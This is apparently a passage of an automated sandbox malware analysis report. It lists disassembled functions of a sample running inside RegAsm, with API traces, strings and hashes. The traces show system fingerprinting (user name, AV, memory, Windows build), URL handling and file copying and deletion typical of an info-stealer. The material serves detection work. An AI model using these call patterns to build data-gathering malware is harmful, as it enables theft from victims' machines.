Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID:
API String ID: 3357907479-0
Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94

Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99

Function 6C09C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C09C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C09C969
GetSystemInfo.KERNEL32(?), ref: 6C09C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C09C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C09C9E2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 2b687c83bbb1db54983b6da137b7663f0e765d500541cbfca8d9287f04cf3800
Instruction ID: 033dceaeec407b3d8ef2012045188200edb150091c9449d5e9ba42178c0bae9c
Opcode Fuzzy Hash: 2b687c83bbb1db54983b6da137b7663f0e765d500541cbfca8d9287f04cf3800
Instruction Fuzzy Hash: AD21D731B412146BDB14AB24CC89BAE73F9EB4A744F60111EF957A7A80DF705D00D794

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416DCD
lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C

Strings

ERROR, xrefs: 00416E54

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

